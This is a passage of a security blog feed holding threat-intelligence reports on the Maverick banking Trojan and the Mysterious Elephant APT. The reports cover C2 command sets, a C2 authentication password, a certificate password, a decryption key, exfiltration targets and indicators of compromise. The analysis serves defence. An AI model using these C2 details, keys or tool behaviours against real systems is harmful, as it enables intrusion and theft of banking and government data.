for contacting the C2 and extracting data with it.</p><h3 id="maverick-agent">Maverick Agent</h3><p>The agent is the binary that will do most of the banker’s work; it will first check if it is running on a machine located in Brazil. To do this, it will check the following constraints:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117732" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3.png" alt="" width="693" height="406" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3.png 693w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3-597x350.png 597w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213458/maverick-banker-distributing3-478x280.png 478w" sizes="auto, (max-width: 693px) 100vw, 693px" /></a></p><p>What each of them does is:</p><ul><li><strong>IsValidBrazilianTimezone()</strong><br />Checks if the current time zone is within the Brazilian time zone range. Brazil has time zones between UTC-5 (-300 min) and UTC-2 (-120 min). If the current time zone is within this range, it returns “true”.</li><li><strong>IsBrazilianLocale()</strong><br />Checks if the current thread’s language or locale is set to Brazilian Portuguese. For example, “pt-BR”, “pt_br”, or any string containing “portuguese” and “brazil”. Returns “true” if the condition is met.</li><li><strong>IsBrazilianRegion()</strong><br />Checks if the system’s configured region is Brazil. It compares region codes like “BR”, “BRA”, or checks if the region name contains “brazil”. Returns “true” if the region is set to Brazil.</li><li><strong>IsBrazilianDateFormat()</strong><br />Checks if the short date format follows the Brazilian standard. The Brazilian format is dd/MM/yyyy. The function checks if the pattern starts with “dd/” and contains “/MM/” or “dd/MM”.</li></ul><p>Right after the check, it will enable appropriate DPI support for the operating system and monitor type, ensuring that images are sharp, fit the correct scale (screen zoom), and work well on multiple monitors with different resolutions. Then, it will check for any running persistence, previously created in “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\”. If more than one file is found, it will delete the others based on “GetCreationTime” and keep only the most recently created one.</p><h2 id="c2-communication">C2 communication</h2><p>Communication uses the WatsonTCP library with SSL tunnels. It utilizes a local encrypted X509 certificate to protect the communication, which is another similarity to the Coyote malware. The connection is made to the host “casadecampoamazonas.com” on port 443. The certificate is exported as encrypted, and the password used to decrypt it is Maverick2025!. After the certificate is decrypted, the client will connect to the server.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117733" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15.png" alt="" width="2048" height="527" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1024x264.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-768x198.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1536x395.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1360x350.png 1360w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-740x190.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-1088x280.png 1088w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13213602/maverick-banker-distributing15-800x206.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a></p><p>For the C2 to work, a specific password must be sent during the first contact. The password used by the agent is “101593a51d9c40fc8ec162d67504e221”. Using this password during the first connection will successfully authenticate the agent with the C2, and it will be ready to receive commands from the operator. The important commands are:</p><table><tbody><tr><td><strong>Command</strong></td><td><strong>Description</strong></td></tr><tr><td>INFOCLIENT</td><td>Returns the information of the agent, which is used to identify it on the C2. The information used is described in the next section.</td></tr><tr><td>RECONNECT</td><td>Disconnect, sleep for a few seconds, and reconnect again to the C2.</td></tr><tr><td>REBOOT</td><td>Reboot the machine</td></tr><tr><td>KILLAPPLICATION</td><td>Exit the malware process</td></tr><tr><td>SCREENSHOT</td><td>Take a screenshot and send it to C2, compressed with gzip</td></tr><tr><td>KEYLOGGER</td><td>Enable the keylogger, capture all locally, and send only when the server specifically requests the logs</td></tr><tr><td>MOUSECLICK</td><td>Do a mouse click, used for the remote connection</td></tr><tr><td>KEYBOARDONECHAR</td><td>Press one char, used for the remote connection</td></tr><tr><td>KEYBOARDMULTIPLESCHARS</td><td>Send multiple characters used for the remote connection</td></tr><tr><td>TOOGLEDESKTOP</td><td>Enable remote connection and send multiple screenshots to the machine when they change (it computes a hash of each screenshot to ensure it is not the same image)</td></tr><tr><td>TOOGLEINTERN</td><td>Get a screenshot of a specific window</td></tr><tr><td>GENERATEWINDOWLOCKED</td><td>Lock the screen using one of the banks’ home pages.</td></tr><tr><td>LISTALLHANDLESOPENEDS</td><td>Send all open handles to the server</td></tr><tr><td>KILLPROCESS</td><td>Kill some process by using its handle</td></tr><tr><td>CLOSEHANDLE</td><td>Close a handle</td></tr><tr><td>MINIMIZEHANDLE</td><td>Minimize a window using its handle</td></tr><tr><td>MAXIMIZEHANDLE</td><td>Maximize a window using its handle</td></tr><tr><td>GENERATEWINDOWREQUEST</td><td>Generate a phishing window asking for the victim’s credentials used by banks</td></tr><tr><td>CANCELSCREENREQUEST</td><td>Disable the phishing window</td></tr></tbody></table><p><strong>Agent profile info</strong></p><p>In the “INFOCLIENT” command, the information sent to the C2 is as follows:</p><ul><li><strong>Agent ID:</strong> A SHA256 hash of all primary MAC addresses used by all interfaces</li><li>Username</li><li>Hostname</li><li>Operating system version</li><li>Client version (no value)</li><li>Number of monitors</li><li>Home page (home): “home” indicates which bank’s home screen should be used, sent before the Agent is decrypted by the banking application monitoring routine.</li><li>Screen resolution</li></ul><h2 id="conclusion">Conclusion</h2><p>According to our telemetry, all victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location. Even so, the malware is designed to target only Brazilians at the moment.<br />It is evident that this threat is very sophisticated and complex; the entire execution chain is relatively new, but the final payload has many code overlaps and similarities with the Coyote banking Trojan, which we documented in 2024. However, some of the techniques are not exclusive to Coyote and have been observed in other low-profile banking Trojans written in .NET. The agent’s structure is also different from how Coyote operated; it did not use this architecture before.<br />It is very likely that Maverick is a new banking Trojan using shared code from Coyote, which may indicate that the developers of Coyote have completely refactored and rewritten a large part of their components.<br />This is one of the most complex infection chains we have ever detected, designed to load a banking Trojan. It has infected many people in Brazil, and its worm-like nature allows it to spread exponentially by exploiting a very popular instant messenger. The impact is enormous. Furthermore, it demonstrates the use of AI in the code-writing process, specifically in certificate decryption, which may also indicate the involvement of AI in the overall code development. Maverick works like any other banking Trojan, but the worrying aspects are its delivery method and its significant impact.<br />We have detected the entire infection chain since day one, preventing victim infection from the initial LNK file. Kaspersky products detect this threat with the verdict <strong>HEUR:Trojan.Multi.Powenot.a</strong> and <strong>HEUR:Trojan-Banker.MSIL.Maverick.gen.</strong></p><h2 id="iocs">IoCs</h2><table><tbody><tr><td>Dominio</td><td>IP</td><td>ASN</td></tr><tr><td><a href="https://opentip.kaspersky.com/casadecampoamazonas.com/?icid=gl_sl_opentip_sm-team_9d1b9de83ae3bad6&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener"><strong>casadecampoamazonas[.]com</strong></a></td><td>181.41.201.184</td><td>212238</td></tr><tr><td><a href="https://opentip.kaspersky.com/sorvetenopote.com/?icid=gl_sl_opentip_sm-team_153c14d9b642446a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener"><strong>sorvetenopote[.]com</strong></a></td><td>77.111.101.169</td><td>396356</td></tr></tbody></table>]]></content:encoded> <wfw:commentRss>https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/15073641/SL-Maverick-Brazilian-banker-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Mysterious Elephant: a growing threat</title> <link>https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/</link> <comments>https://securelist.com/mysterious-elephant-apt-ttps-and-tools/117596/#respond</comments> <dc:creator><![CDATA[Noushin Shabab, Ye Jin]]></dc:creator> <pubDate>Wed, 15 Oct 2025 10:00:11 +0000</pubDate> <category><![CDATA[APT reports]]></category> <category><![CDATA[GReAT research]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Targeted attacks]]></category> <category><![CDATA[Google Chrome]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Spear phishing]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[APT]]></category> <category><![CDATA[RAT Trojan]]></category> <category><![CDATA[Backdoor]]></category> <category><![CDATA[WhatsApp]]></category> <category><![CDATA[Data theft]]></category> <category><![CDATA[Defense evasion]]></category> <category><![CDATA[TTPs]]></category> <category><![CDATA[APAC]]></category> <category><![CDATA[RC4]]></category><category><![CDATA[APT (Targeted attacks)]]></category> <category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117596</guid> <description><![CDATA[Kaspersky GReAT experts describe the latest Mysterious Elephant APT activity. The threat actor exfiltrates data related to WhatsApp and employs tools such as BabShell and MemLoader HidenDesk.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30145442/mysterious-elephant-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2><p>Mysterious Elephant is a highly active advanced persistent threat (APT) group that we at Kaspersky GReAT discovered in 2023. It has been consistently evolving and adapting its tactics, techniques, and procedures (TTPs) to stay under the radar. With a primary focus on targeting government entities and foreign affairs sectors in the Asia-Pacific region, the group has been using a range of sophisticated tools and techniques to infiltrate and exfiltrate sensitive information. Notably, Mysterious Elephant has been exploiting WhatsApp communications to steal sensitive data, including documents, pictures, and archive files.</p><p>The group’s latest campaign, which began in early 2025, reveals a significant shift in their TTPs, with an increased emphasis on using new custom-made tools as well as customized open-source tools, such as BabShell and MemLoader modules, to achieve their objectives. In this report, we will delve into the history of Mysterious Elephant’s attacks, their latest tactics and techniques, and provide a comprehensive understanding of this threat.</p><h2 id="the-emergence-of-mysterious-elephant">The emergence of Mysterious Elephant</h2><p>Mysterious Elephant is a threat actor <a href="https://securelist.com/apt-trends-report-q2-2023/110231/#mysterious-elephant" target="_blank" rel="noopener">we’ve been tracking since 2023</a>. Initially, its intrusions resembled those of the Confucius threat actor. However, further analysis revealed a more complex picture. We found that Mysterious Elephant’s malware contained code from multiple APT groups, including Origami Elephant, Confucius, and SideWinder, which suggested deep collaboration and resource sharing between teams. Notably, our research indicates that the tools and code borrowed from the aforementioned APT groups were previously used by their original developers, but have since been abandoned or replaced by newer versions. However, Mysterious Elephant has not only adopted these tools, but also continued to maintain, develop, and improve them, incorporating the code into their own operations and creating new, advanced versions. The actor’s early attack chains featured distinctive elements, such as remote template injections and exploitation of <a href="https://www.cve.org/CVERecord?id=CVE-2017-11882" target="_blank" rel="noopener">CVE-2017-11882</a>, followed by the use of a downloader called “Vtyrei”, which was previously connected to Origami Elephant and later abandoned by this group. Over time, Mysterious Elephant has continued to upgrade its tools and expanded its operations, eventually earning its designation as a previously unidentified threat actor.</p><h2 id="latest-campaign">Latest campaign</h2><p>The group’s latest campaign, which was discovered in early 2025, reveals a significant shift in their TTPs. They are now using a combination of exploit kits, phishing emails, and malicious documents to gain initial access to their targets. Once inside, they deploy a range of custom-made and open-source tools to achieve their objectives. In the following sections, we’ll delve into the latest tactics and techniques used by Mysterious Elephant, including their new tools, infrastructure, and victimology.</p><h3 id="spear-phishing">Spear phishing</h3><p>Mysterious Elephant has started using spear phishing techniques to gain initial access. Phishing emails are tailored to each victim and are convincingly designed to mimic legitimate correspondence. The primary targets of this APT group are countries in the South Asia (SA) region, particularly Pakistan. Notably, this APT organization shows a strong interest and inclination towards diplomatic institutions, which is reflected in the themes covered by the threat actor’s spear phishing emails, as seen in bait attachments.</p><div id="attachment_117597" style="width: 690px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117597" class="size-full wp-image-117597" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1.png" alt="Spear phishing email used by Mysterious Elephant" width="680" height="617" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1.png 680w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1-300x272.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1-386x350.png 386w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101320/mysterious-elephant1-309x280.png 309w" sizes="auto, (max-width: 680px) 100vw, 680px" /></a><p id="caption-attachment-117597" class="wp-caption-text">Spear phishing email used by Mysterious Elephant</p></div><p>For example, the decoy document above concerns Pakistan’s application for a non-permanent seat on the United Nations Security Council for the 2025–2026 term.</p><h3 id="malicious-tools">Malicious tools</h3><p>Mysterious Elephant’s toolkit is a noteworthy aspect of their operations. The group has switched to using a variety of custom-made and open-source tools instead of employing known malware to achieve their objectives.</p><h4 id="powershell-scripts">PowerShell scripts</h4><p>The threat actor uses PowerShell scripts to execute commands, deploy additional payloads, and establish persistence. These scripts are loaded from C2 servers and often use legitimate system administration tools, such as curl and certutil, to download and execute malicious files.</p><div id="attachment_117598" style="width: 696px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117598" class="size-full wp-image-117598" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2.png" alt="Malicious PowerShell script seen in Mysterious Elephant's 2025 attacks" width="686" height="138" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2.png 686w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101409/mysterious-elephant2-300x60.png 300w" sizes="auto, (max-width: 686px) 100vw, 686px" /></a><p id="caption-attachment-117598" class="wp-caption-text">Malicious PowerShell script seen in Mysterious Elephant’s 2025 attacks</p></div><p>For example, the script above is used to download the next-stage payload and save it as <code>ping.exe</code>. It then schedules a task to execute the payload and send the results back to the C2 server. The task is set to run automatically in response to changes in the network profile, ensuring persistence on the compromised system. Specifically, it is triggered by network profile-related events (Microsoft-Windows-NetworkProfile/Operational), which can indicate a new network connection. A four-hour delay is configured after the event, likely to help evade detection.</p><h4 id="babshell">BabShell</h4><p>One of the most recent tools used by Mysterious Elephant is BabShell. This is a reverse shell tool written in C++ that enables attackers to connect to a compromised system. Upon execution, it gathers system information, including username, computer name, and MAC address, to identify the machine. The malware then enters an infinite loop of performing the following steps:</p><ol><li>It listens for and receives commands from the attacker-controlled C2 server.</li><li>For each received command, BabShell creates a separate thread to execute it, allowing for concurrent execution of multiple commands.</li><li>The output of each command is captured and saved to a file named <code>output_[timestamp].txt</code>, where [timestamp] is the current time. This allows the attacker to review the results of the commands.</li><li>The contents of the <code>output_[timestamp].txt</code> file are then transmitted back to the C2 server, providing the attacker with the outcome of the executed commands and enabling them to take further actions, for instance, deploy a next-stage payload or execute additional malicious instructions.</li></ol><p>BabShell uses the following commands to execute command-line instructions and additional payloads it receives from the server:</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117599" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3.png" alt="" width="808" height="76" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3.png 808w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-300x28.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-768x72.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-800x75.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30101459/mysterious-elephant3-740x70.png 740w" sizes="auto, (max-width: 808px) 100vw, 808px" /></a></p><h4 id="customized-open-source-tools">Customized open-source tools</h4><p>One of the latest modules used by Mysterious Elephant and loaded by BabShell is MemLoader HidenDesk.</p><p>MemLoader HidenDesk is a reflective PE loader that loads and executes malicious payloads in memory. It uses encryption and compression to evade detection.</p><p>MemLoader HidenDesk operates in the following manner:</p><ol><li>The malware checks the number of active processes and terminates itself if there are fewer than 40 processes running — a technique used to evade sandbox analysis.</li><li>It creates a shortcut to its executable and saves it in the autostart folder, ensuring it can restart itself after a system reboot.</li><li>The malware then creates a hidden desktop named “MalwareTech_Hidden” and switches to it, providing a covert environment for its activities. This technique is borrowed from an open-source project on GitHub.</li><li>Using an RC4-like algorithm with the key <code>D12Q4GXl1SmaZv3hKEzdAhvdBkpWpwcmSpcD</code>, the malware decrypts a block of data from its own binary and executes it in memory as a shellcode. The shellcode’s sole purpose is to load and execute a PE file, specifically a sample of the commercial RAT called “Remcos” (MD5: 037b2f6233ccc82f0c75bf56c47742bb).</li></ol><p>Another recent loader malware used in the latest campaign is MemLoader Edge.</p><p>MemLoader Edge is a malicious loader that embeds a sample of the VRat backdoor, utilizing encryption and evasion techniques.</p><p>It operates in the following manner:</p><ol><li>The malware performs a network connectivity test by attempting to connect to the legitimate website <code>bing.com:445</code>, which is likely to fail since the 445 port is not open on the server side. If the test were to succeed, suggesting that the loader is possibly in an emulation or sandbox environment, the malware would drop an embedded picture on the machine and display a popup window with three unresponsive mocked-up buttons, then enter an infinite loop. This is done to complicate detection and analysis.</li><li>If the connection attempt fails, the malware iterates through a 1016-byte array to find the correct XOR keys for decrypting the embedded PE file in two rounds. The process continues until the decrypted data matches the byte sequence of <code>MZ\x90</code>, indicating that the real XOR keys are found within the array.</li><li>If the malware is unable to find the correct XOR keys, it will display the same picture and popup window as before, followed by a message box containing an error message after the window is closed.</li><li>Once the PE file is successfully decrypted, it is loaded into memory using reflective loading techniques. The decrypted PE file is based on the open-source RAT vxRat, which is referred to as VRat due to the PDB string found in the sample:<br /><pre class="urvanov-syntax-highlighter-plain-tag">C:\Users\admin\source\repos\vRat_Client\Release\vRat_Client.pdb</pre></li></ol><h4 id="whatsapp-specific-exfiltration-tools">WhatsApp-specific exfiltration tools</h4><p>Spying on WhatsApp communications is a key aspect of the exfiltration modules employed by Mysterious Elephant. They are designed to steal sensitive data from compromised systems. The attackers have implemented WhatsApp-specific features into their exfiltration tools, allowing them to target files shared through the WhatsApp application and exfiltrate valuable information, including documents, pictures, archive files, and more. These modules employ various techniques, such as recursive directory traversal, XOR decryption, and Base64 encoding, to evade detection and upload the stolen data to the attackers’ C2 servers.</p><ul><li><strong>Uplo Exfiltrator</strong></li></ul><p>The Uplo Exfiltrator is a data exfiltration tool that targets specific file types and uploads them to the attackers’ C2 servers. It uses a simple XOR decryption to deobfuscate C2 domain paths and employs a recursive <a href="https://en.wikipedia.org/wiki/Depth-first_search" target="_blank" rel="noopener">depth-first directory traversal algorithm</a> to identify valuable files. The malware specifically targets file types that are likely to contain potentially sensitive data, including documents, spreadsheets, presentations, archives, certificates, contacts, and images. The targeted file extensions include .TXT, .DOC, .DOCX, .PDF, .XLS, .XLSX, .CSV, .PPT, .PPTX, .ZIP, .RAR, .7Z, .PFX, .VCF, .JPG, .JPEG, and .AXX.</p><ul><li><strong>Stom Exfiltrator</strong></li></ul><p>The Stom Exfiltrator is a commonly used exfiltration tool that recursively searches specific directories, including the “Desktop” and “Downloads” folders, as well as all drives except the C drive, to collect files with predefined extensions. Its latest variant is specifically designed to target files shared through the WhatsApp application. This version uses a hardcoded folder path to locate and exfiltrate such files:</p><pre class="urvanov-syntax-highlighter-plain-tag">%AppData%\\Packages\\xxxxx.WhatsAppDesktop_[WhatsApp ID]\\LocalState\\Shared\\transfers\\</pre><p><p>The targeted file extensions include .PDF, .DOCX, .TXT, .JPG, .PNG, .ZIP, .RAR, .PPTX, .DOC, .XLS, .XLSX, .PST, and .OST.</p><ul><li><strong>ChromeStealer Exfiltrator</strong></li></ul><p>The ChromeStealer Exfiltrator is another exfiltration tool used by Mysterious Elephant that targets Google Chrome browser data, including cookies, tokens, and other sensitive information. It searches specific directories within the Chrome user data of the most recently used Google Chrome profile, including the IndexedDB directory and the “Local Storage” directory. The malware uploads all files found in these directories to the attacker-controlled C2 server, potentially exposing sensitive data like chat logs, contacts, and authentication tokens. The response from the C2 server suggests that this tool was also after stealing files related to WhatsApp. The ChromeStealer Exfiltrator employs string obfuscation to evade detection.</p><h2 id="infrastructure">Infrastructure</h2><p>Mysterious Elephant’s infrastructure is a network of domains and IP addresses. The group has been using a range of techniques, including wildcard DNS records, to generate unique domain names for each request. This makes it challenging for security researchers to track and monitor their activities. The attackers have also been using virtual private servers (VPS) and cloud services to host their infrastructure. This allows them to easily scale and adapt their operations to evade detection. According to our data, this APT group has utilized the services of numerous VPS providers in their operations. Nevertheless, our analysis of the statistics has revealed that Mysterious Elephant appears to have a preference for certain VPS providers.</p><div class="js-infogram-embed" data-id="_/PYFxzOySORx2YCuG6lUv" data-type="interactive" data-title="01-EN-RU-Mysterious Elephant charts" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>VPS providers most commonly used by Mysterious Elephant (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/09/30102127/mysterious-elephant4.png" target="_blank" rel="noopener">download</a>)</em></p><h2 id="victimology">Victimology</h2><p>Mysterious Elephant’s primary targets are government entities and foreign affairs sectors in the Asia-Pacific region. The group has been focusing on Pakistan, Bangladesh, and Sri Lanka, with a lower number of victims in other countries. The attackers have been using highly customized payloads tailored to specific individuals, highlighting their sophistication and focus on targeted attacks.</p><p>The group’s victimology is characterized by a high degree of specificity. Attackers often use personalized phishing emails and malicious documents to gain initial access. Once inside, they employ a range of tools and techniques to escalate privileges, move laterally, and exfiltrate sensitive information.</p><ul><li>Most targeted countries: Pakistan, Bangladesh, Afghanistan, Nepal and Sri Lanka</li></ul><div class="js-infogram-embed" data-id="_/R4Utu2bH5IoYCk7MIBoH" data-type="interactive" data-title="01 EN Mysterious Elephant charts 2" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Countries targeted most often by Mysterious Elephant (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14095041/02-en-mysterious-elephant-charts.png" target="_blank" rel="noopener">download</a>)</em></p><ul><li>Primary targets: government entities and foreign affairs sectors</li></ul><div class="js-infogram-embed" data-id="_/NNQDAbzeYeYkE3UXVrZ5" data-type="interactive" data-title="03 EN Mysterious Elephant charts" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Industries most targeted by Mysterious Elephant (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13125733/03-en-mysterious-elephant-charts.png" target="_blank" rel="noopener">download</a>)</em></p><h2 id="conclusion">Conclusion</h2><p>In conclusion, Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region. Through their continuous evolution and adaptation of tactics, techniques, and procedures, the group has demonstrated the ability to evade detection and infiltrate sensitive systems. The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.</p><p>The group’s focus on targeting specific organizations, combined with their ability to tailor their attacks to specific victims, underscores the severity of the threat they pose. The exfiltration of sensitive information, including documents, pictures, and archive files, can have significant consequences for national security and global stability.</p><p>To counter the Mysterious Elephant threat, it is essential for organizations to implement <a href="https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____b31b3f3de449f764" target="_blank" rel="noopener">robust security measures</a>, including regular software updates, <a href="https://www.kaspersky.com/enterprise-security/anti-targeted-attack-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kata____86b6b7fe75e32725" target="_blank" rel="noopener">network monitoring</a>, and <a href="https://asap.kaspersky.com/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kasap____b3c004b7eec21817" target="_blank" rel="noopener">employee training</a>. Additionally, international cooperation and information sharing among cybersecurity professionals, governments, and industries are crucial in tracking and disrupting the group’s activities.</p><p>Ultimately, staying ahead of Mysterious Elephant and other APT groups requires a proactive and collaborative approach to cybersecurity. By understanding their TTPs, sharing threat intelligence, and implementing effective countermeasures, we can reduce the risk of successful attacks and protect sensitive information from falling into the wrong hands.</p><h2 id="indicators-of-compromise">Indicators of compromise</h2><h3 id="file-hashes">File hashes</h3><p><strong>Malicious documents</strong><br /><a href="https://opentip.kaspersky.com/c12ea05baf94ef6f0ea73470d70db3b2/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______09ab9e63c2fbae18&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">c12ea05baf94ef6f0ea73470d70db3b2</a> M6XA.rar<br /><a href="https://opentip.kaspersky.com/8650fff81d597e1a3406baf3bb87297f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a7b7bdc14f0ecf16&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8650fff81d597e1a3406baf3bb87297f</a> 2025-013-PAK-MoD-Invitation_the_UN_Peacekeeping.rar</p><p><strong>MemLoader HidenDesk</strong><br /><a href="https://opentip.kaspersky.com/658eed7fcb6794634bbdd7f272fcf9c6/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c1ee1e8efe731ce5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">658eed7fcb6794634bbdd7f272fcf9c6</a> STI.dll<br /><a href="https://opentip.kaspersky.com/4c32e12e73be9979ede3f8fce4f41a3a/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______39679c1e6198215a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">4c32e12e73be9979ede3f8fce4f41a3a</a> STI.dll</p><p><strong>MemLoader Edge</strong><br /><a href="https://opentip.kaspersky.com/3caaf05b2e173663f359f27802f10139/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______517ed2c79ff6857a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3caaf05b2e173663f359f27802f10139</a> Edge.exe, debugger.exe, runtime.exe<br /><a href="https://opentip.kaspersky.com/bc0fc851268afdf0f63c97473825ff75/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4f3755f64aba0268&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">bc0fc851268afdf0f63c97473825ff75</a></p><p><strong>BabShell</strong><br /><a href="https://opentip.kaspersky.com/85c7f209a8fa47285f08b09b3868c2a1/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5fd77beb36827bdb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">85c7f209a8fa47285f08b09b3868c2a1</a><br /><a href="https://opentip.kaspersky.com/f947ff7fb94fa35a532f8a7d99181cf1/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cff906b0140720d0&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">f947ff7fb94fa35a532f8a7d99181cf1</a></p><p><strong>Uplo Exfiltrator</strong><br /><a 